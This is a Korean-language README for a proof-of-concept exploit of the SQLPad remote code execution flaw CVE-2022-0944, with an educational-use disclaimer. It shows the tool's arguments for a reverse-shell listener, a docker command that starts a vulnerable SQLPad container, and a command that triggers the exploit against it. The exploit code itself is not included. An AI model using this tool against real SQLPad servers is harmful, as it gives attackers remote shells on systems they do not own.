
SQLPad RCE(CVE-2022-0944)에 대한 개념 증명 익스플로잇.
SQLPad RCE (CVE-2022-0944)에 대한 개념 증명 익스플로잇
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
예시:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
이 저장소는 교육 목적으로만 제공되는 코드와 도구를 포함하며, 특히 사이버 보안 강좌 및 학습 환경에서의 사용을 위한 것입니다. 이 코드의 작성자는 본 코드의 사용, 오용 또는 수정으로 인해 발생하는 어떠한 결과에 대해서도 책임을 지지 않습니다. 본 코드는 상품성 또는 특정 목적에의 적합성에 대한 묵시적 보증을 포함하되 이에 국한되지 않는, 명시적이거나 묵시적인 어떠한 보증 없이 "있는 그대로" 제공됩니다.